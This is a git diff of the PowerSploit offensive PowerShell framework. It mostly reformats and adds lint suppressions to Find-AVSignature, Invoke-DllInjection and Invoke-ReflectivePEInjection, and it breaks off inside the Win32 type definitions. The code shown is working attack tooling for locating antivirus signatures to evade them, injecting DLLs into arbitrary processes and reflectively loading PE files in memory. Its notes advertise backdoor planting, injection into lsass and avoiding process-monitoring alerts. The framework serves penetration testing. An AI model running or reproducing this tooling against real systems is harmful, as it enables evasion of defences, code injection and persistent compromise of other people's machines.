157 files changed, 41792 insertions, 13294 deletions

diff --git a/AntivirusBypass/Find-AVSignature.ps1 b/AntivirusBypass/Find-AVSignature.ps1
index d2487b3..05cd969 100644
--- a/AntivirusBypass/Find-AVSignature.ps1
+++ b/AntivirusBypass/Find-AVSignature.ps1
@@ -5,11 +5,11 @@ function Find-AVSignature
 
 Locate tiny AV signatures.
 
-PowerSploit Function: Find-AVSignature
-Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Find-AVSignature  
+Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -37,19 +37,19 @@ Optionally specifies the directory to write the binaries to.
 
 .PARAMETER BufferLen
 
-Specifies the length of the file read buffer .  Defaults to 64KB.  
+Specifies the length of the file read buffer .  Defaults to 64KB.
 
 .PARAMETER Force
 
-Forces the script to continue without confirmation.    
+Forces the script to continue without confirmation.
 
 .EXAMPLE
 
-PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe 
-PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
-PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
-PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
-PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
+Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
+Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
+Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
+Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
+Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
 
 .NOTES
 
@@ -63,10 +63,12 @@ http://www.exploit-monday.com/
 http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
 #>
 
-    [CmdletBinding()] Param(
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [CmdletBinding()]
+    Param(
         [Parameter(Mandatory = $True)]
         [ValidateRange(0,4294967295)]
-		[UInt32]
+        [UInt32]
         $StartByte,
 
         [Parameter(Mandatory = $True)]
@@ -75,23 +77,21 @@ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
 
         [Parameter(Mandatory = $True)]
         [ValidateRange(0,4294967295)]
-		[UInt32]
+        [UInt32]
         $Interval,
 
         [String]
-		[ValidateScript({Test-Path $_ })]
+        [ValidateScript({Test-Path $_ })]
         $Path = ($pwd.path),
 
         [String]
         $OutPath = ($pwd),
-		
-		
-		[ValidateRange(1,2097152)]
-		[UInt32]
-		$BufferLen = 65536,
-		
+
+        [ValidateRange(1,2097152)]
+        [UInt32]
+        $BufferLen = 65536,
+
         [Switch] $Force
-		
     )
 
     #test variables
@@ -99,88 +99,88 @@ http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
     $Response = $True
     if (!(Test-Path $OutPath)) {
         if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory}
-	}
+    }
     if (!$Response) {Throw "Output path not found"}
     if (!(Get-ChildItem $Path).Exists) {Throw "File not found"}
     [Int32] $FileSize = (Get-ChildItem $Path).Length
     if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"}
     [Int32] $MaximumByte = (($FileSize) - 1)
     if ($EndByte -ceq "max") {$EndByte = $MaximumByte}
-	
-	#Recast $Endbyte into an Integer so that it can be compared properly. 
-	[Int32]$EndByte = $EndByte 
-	
-	#If $Endbyte is greater than the file Length, use $MaximumByte.
+
+    #Recast $Endbyte into an Integer so that it can be compared properly.
+    [Int32]$EndByte = $EndByte
+
+    #If $Endbyte is greater than the file Length, use $MaximumByte.
     if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte}
-	
-	#If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte.
-	if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval}
 
-	Write-Verbose "StartByte: $StartByte"
-	Write-Verbose "EndByte: $EndByte"
-	
+    #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte.
+    if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval}
+
+    Write-Verbose "StartByte: $StartByte"
+    Write-Verbose "EndByte: $EndByte"
+
     #find the filename for the output name
     [String] $FileName = (Split-Path $Path -leaf).Split('.')[0]
 
     #Calculate the number of binaries
     [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval)
     if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)}
-    
+
     #Prompt user to verify parameters to avoid writing binaries to the wrong directory
     $Response = $True
     if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!",
              "Do you want to continue?"))){}
     if (!$Response) {Return}
-    
-    Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." 
+
+    Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"."
     [Int32] $Number = [Math]::Floor($Endbyte/$Interval)
-    
-		#Create a Read Buffer and Stream. 
-		#Note: The Filestream class takes advantage of internal .NET Buffering.  We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc.
-		[Byte[]] $ReadBuffer=New-Object byte[] $BufferLen
-		[System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)
-		
-        #write out the calculated number of binaries
-        [Int32] $i = 0
-        for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++)
-        {
-			# If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval
-			if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte}
-			else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))}
-			
-			Write-Verbose "Byte 0 -> $($SplitByte)"
-			
-			#Reset ReadStream to beginning of file
-			$ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
-			
-			#Build a new FileStream for Writing
-			[String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin"
-			[System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)
-			
-			[Int32] $BytesLeft = $SplitByte
-			Write-Verbose "$($WriteStream.name)"
-			
-			#Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer 
-			while ($BytesLeft -gt $BufferLen){
-				[Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen)
-				$WriteStream.Write($ReadBuffer, 0, $count)
-				$BytesLeft = $BytesLeft - $count
-			}
-			
-			#Write the remaining bytes to the file 
-			do {
-				[Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft)
-				$WriteStream.Write($ReadBuffer, 0, $count)
-				$BytesLeft = $BytesLeft - $count			
-			}
-			until ($BytesLeft -eq 0)
-			$WriteStream.Close()
-			$WriteStream.Dispose()
+
+    #Create a Read Buffer and Stream.
+    #Note: The Filestream class takes advantage of internal .NET Buffering.  We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc.
+    [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen
+    [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)
+
+    #write out the calculated number of binaries
+    [Int32] $i = 0
+    for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++)
+    {
+        # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval
+        if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte}
+        else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))}
+
+        Write-Verbose "Byte 0 -> $($SplitByte)"
+
+        #Reset ReadStream to beginning of file
+        $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
+
+        #Build a new FileStream for Writing
+        [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin"
+        [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)
+
+        [Int32] $BytesLeft = $SplitByte
+        Write-Verbose "$($WriteStream.name)"
+
+        #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer
+        while ($BytesLeft -gt $BufferLen){
+            [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen)
+            $WriteStream.Write($ReadBuffer, 0, $count)
+            $BytesLeft = $BytesLeft - $count
+        }
+
+        #Write the remaining bytes to the file
+        do {
+            [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft)
+            $WriteStream.Write($ReadBuffer, 0, $count)
+            $BytesLeft = $BytesLeft - $count
         }
-        Write-Verbose "Files written to disk. Flushing memory."
-        $ReadStream.Dispose()
-        
-		#During testing using large binaries, memory usage was excessive so lets fix that
-        [System.GC]::Collect()
-        Write-Verbose "Completed!"
+        until ($BytesLeft -eq 0)
+        $WriteStream.Close()
+        $WriteStream.Dispose()
+    }
+    Write-Verbose "Files written to disk. Flushing memory."
+    $ReadStream.Dispose()
+
+    #During testing using large binaries, memory usage was excessive so lets fix that
+    [System.GC]::Collect()
+    Write-Verbose "Completed!"
 }
diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1
index 369d606..d23e989 100644
--- a/CodeExecution/Invoke-DllInjection.ps1
+++ b/CodeExecution/Invoke-DllInjection.ps1
@@ -5,15 +5,19 @@ function Invoke-DllInjection
 

 Injects a Dll into the process ID of your choosing.

 

-PowerSploit Function: Invoke-DllInjection

-Author: Matthew Graeber (@mattifestation)

-License: BSD 3-Clause

-Required Dependencies: None

-Optional Dependencies: None

+PowerSploit Function: Invoke-DllInjection  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None  

 

 .DESCRIPTION

 

 Invoke-DllInjection injects a Dll into an arbitrary process.

+It does this by using VirtualAllocEx to allocate memory the size of the

+DLL in the remote process, writing the names of the DLL to load into the

+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread

+to invoke LoadLibraryA in the context of the remote process.

 

 .PARAMETER ProcessID

 

@@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information.
 http://www.exploit-monday.com

 #>

 

+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]

+    [CmdletBinding()]

     Param (

         [Parameter( Position = 0, Mandatory = $True )]

         [Int]

@@ -59,7 +65,7 @@ http://www.exploit-monday.com
     {

         Throw "Process does not exist!"

     }

-    

+

     # Confirm that the path to the dll exists

     try

     {

@@ -79,11 +85,11 @@ http://www.exploit-monday.com
         Param

         (

             [OutputType([Type])]

-            

+

             [Parameter( Position = 0)]

             [Type[]]

             $Parameters = (New-Object Type[](0)),

-            

+

             [Parameter( Position = 1 )]

             [Type]

             $ReturnType = [Void]

@@ -98,7 +104,7 @@ http://www.exploit-monday.com
         $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')

         $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)

         $MethodBuilder.SetImplementationFlags('Runtime, Managed')

-        

+

         Write-Output $TypeBuilder.CreateType()

     }

 

@@ -107,11 +113,11 @@ http://www.exploit-monday.com
         Param

         (

             [OutputType([IntPtr])]

-        

+

             [Parameter( Position = 0, Mandatory = $True )]

             [String]

             $Module,

-            

+

             [Parameter( Position = 1, Mandatory = $True )]

             [String]

             $Procedure

@@ -128,7 +134,7 @@ http://www.exploit-monday.com
         $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))

         $tmpPtr = New-Object IntPtr

         $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)

-        

+

         # Return the address of the function

         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))

     }

@@ -142,43 +148,43 @@ http://www.exploit-monday.com
             [String]

             $Path

         )

-    

+

         # Parse PE header to see if binary was compiled 32 or 64-bit

         $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)

-    

+

         [Byte[]] $MZHeader = New-Object Byte[](2)

         $FileStream.Read($MZHeader,0,2) | Out-Null

-    

+

         $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)

         if ($Header -ne 'MZ')

         {

             $FileStream.Close()

             Throw 'Invalid PE header.'

         }

-    

+

         # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)

         $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null

-    

+

         [Byte[]] $lfanew = New-Object Byte[](4)

-    

+

         # Read offset to the PE Header (will be read in reverse)

         $FileStream.Read($lfanew,0,4) | Out-Null

-        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))

-    

+        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))

+

         # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE

         $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null

         [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)

-    

+

         # Read compiled architecture

         $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null

-        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')

+        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')

         $FileStream.Close()

-    

+

         if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))

         {

             Throw 'Invalid PE header or unsupported architecture.'

         }

-    

+

         if ($Architecture -eq '014C')

         {

             Write-Output 'X86'

@@ -193,7 +199,7 @@ http://www.exploit-monday.com
         }

     }

 

-    

+

     # Get addresses of and declare delegates for essential Win32 functions.

     $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess

     $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])

@@ -307,7 +313,7 @@ http://www.exploit-monday.com
     {

         Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"

     }

-    

+

     $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)

 

     # Close process handle

@@ -317,7 +323,7 @@ http://www.exploit-monday.com
 

     # Extract just the filename from the provided path to the dll.

     $FileName = (Split-Path $Dll -Leaf).ToLower()

-    $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) }

+    $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }

 

     if (!$DllInfo)

     {

diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1
index 42900fb..c756dd9 100644
--- a/CodeExecution/Invoke-ReflectivePEInjection.ps1
+++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1
@@ -3,8 +3,8 @@ function Invoke-ReflectivePEInjection
 <#
 .SYNOPSIS
 
-This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, 
-or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, 
+This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
+or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
 please lead the Notes section (GENERAL NOTES) for information on how to use them.
 
 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
@@ -17,15 +17,15 @@ this will load and execute the DLL/EXE in to memory without writing any files to
 As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.
 
 This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output
-from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the 
-remote process. 
+from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
+remote process.
 
-PowerSploit Function: Invoke-ReflectivePEInjection
-Author: Joe Bialek, Twitter: @JosephBialek
-Code review and modifications: Matt Graeber, Twitter: @mattifestation
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-ReflectivePEInjection  
+Author: Joe Bialek, Twitter: @JosephBialek  
+Code review and modifications: Matt Graeber, Twitter: @mattifestation  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  
 
 .DESCRIPTION
 
@@ -42,13 +42,13 @@ Optional, an array of computernames to run the script on.
 .PARAMETER FuncReturnType
 
 Optional, the return type of the function being called in the DLL. Default: Void
-	Options: String, WString, Void. See notes for more information.
-	IMPORTANT: For DLLs being loaded remotely, only Void is supported.
-	
+    Options: String, WString, Void. See notes for more information.
+    IMPORTANT: For DLLs being loaded remotely, only Void is supported.
+
 .PARAMETER ExeArgs
 
 Optional, arguments to pass to the executable being reflectively loaded.
-	
+
 .PARAMETER ProcName
 
 Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
@@ -66,7 +66,7 @@ Optional, will force the use of ASLR on the PE being loaded even if the PE indic
 .PARAMETER DoNotZeroMZ
 
 Optional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once.
-	
+
 .EXAMPLE
 
 Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
@@ -76,7 +76,7 @@ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -Computer
 .EXAMPLE
 
 Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
-	the wchar_t* returned by WStringFunc() from all the computers.
+    the wchar_t* returned by WStringFunc() from all the computers.
 $PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll')
 Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
 
@@ -102,19 +102,19 @@ Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Tar
 GENERAL NOTES:
 The script has 3 basic sets of functionality:
 1.) Reflectively load a DLL in to the PowerShell process
-	-Can return DLL output to user when run remotely or locally.
-	-Cleans up memory in the PS process once the DLL finishes executing.
-	-Great for running pentest tools on remote computers without triggering process monitoring alerts.
-	-By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
+    -Can return DLL output to user when run remotely or locally.
+    -Cleans up memory in the PS process once the DLL finishes executing.
+    -Great for running pentest tools on remote computers without triggering process monitoring alerts.
+    -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
 2.) Reflectively load an EXE in to the PowerShell process.
-	-Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.
-	-Cleans up memory in the PS process once the DLL finishes executing.
-	-Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
+    -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.
+    -Cleans up memory in the PS process once the DLL finishes executing.
+    -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
 3.) Reflectively inject a DLL in to a remote process.
-	-Can NOT return DLL output to the user when run remotely OR locally.
-	-Does NOT clean up memory in the remote process if/when DLL finishes execution.
-	-Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
-	-Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.
+    -Can NOT return DLL output to the user when run remotely OR locally.
+    -Does NOT clean up memory in the remote process if/when DLL finishes execution.
+    -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
+    -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.
 
 DLL LOADING NOTES:
 
@@ -159,725 +159,727 @@ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/
 Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/
 #>
 
+[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')]
+[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSPossibleIncorrectComparisonWithNull', '')]
 [CmdletBinding()]
 Param(
     [Parameter(Position = 0, Mandatory = $true)]
     [ValidateNotNullOrEmpty()]
     [Byte[]]
     $PEBytes,
-	
-	[Parameter(Position = 1)]
-	[String[]]
-	$ComputerName,
-	
-	[Parameter(Position = 2)]
+
+    [Parameter(Position = 1)]
+    [String[]]
+    $ComputerName,
+
+    [Parameter(Position = 2)]
     [ValidateSet( 'WString', 'String', 'Void' )]
-	[String]
-	$FuncReturnType = 'Void',
-	
-	[Parameter(Position = 3)]
-	[String]
-	$ExeArgs,
-	
-	[Parameter(Position = 4)]
-	[Int32]
-	$ProcId,
-	
-	[Parameter(Position = 5)]
-	[String]
-	$ProcName,
+    [String]
+    $FuncReturnType = 'Void',
+
+    [Parameter(Position = 3)]
+    [String]
+    $ExeArgs,
+
+    [Parameter(Position = 4)]
+    [Int32]
+    $ProcId,
+
+    [Parameter(Position = 5)]
+    [String]
+    $ProcName,
 
     [Switch]
     $ForceASLR,
 
-	[Switch]
-	$DoNotZeroMZ
+    [Switch]
+    $DoNotZeroMZ
 )
 
 Set-StrictMode -Version 2
 
 
 $RemoteScriptBlock = {
-	[CmdletBinding()]
-	Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Byte[]]
-		$PEBytes,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[String]
-		$FuncReturnType,
-				
-		[Parameter(Position = 2, Mandatory = $true)]
-		[Int32]
-		$ProcId,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[String]
-		$ProcName,
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Byte[]]
+        $PEBytes,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [String]
+        $FuncReturnType,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [Int32]
+        $ProcId,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [String]
+        $ProcName,
 
         [Parameter(Position = 4, Mandatory = $true)]
         [Bool]
         $ForceASLR
-	)
-	
-	###################################
-	##########  Win32 Stuff  ##########
-	###################################
-	Function Get-Win32Types
-	{
-		$Win32Types = New-Object System.Object
-
-		#Define all the structures/enums that will be used
-		#	This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
-		$Domain = [AppDomain]::CurrentDomain
-		$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
-		$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
-		$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
-		$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
-
-
-		############    ENUM    ############
-		#Enum MachineType
-		$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
-		$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
-		$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
-		$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
-		$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
-		$MachineType = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
-
-		#Enum MagicType
-		$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
-		$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
-		$MagicType = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
-
-		#Enum SubSystemType
-		$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
-		$SubSystemType = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
-
-		#Enum DllCharacteristicsType
-		$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
-		$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
-		$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
-		$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
-		$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
-		$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
-		$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
-		$DllCharacteristicsType = $TypeBuilder.CreateType()
-		$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
-
-		###########    STRUCT    ###########
-		#Struct IMAGE_DATA_DIRECTORY
-		$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
-		$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
-		($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
-		($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
-		$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
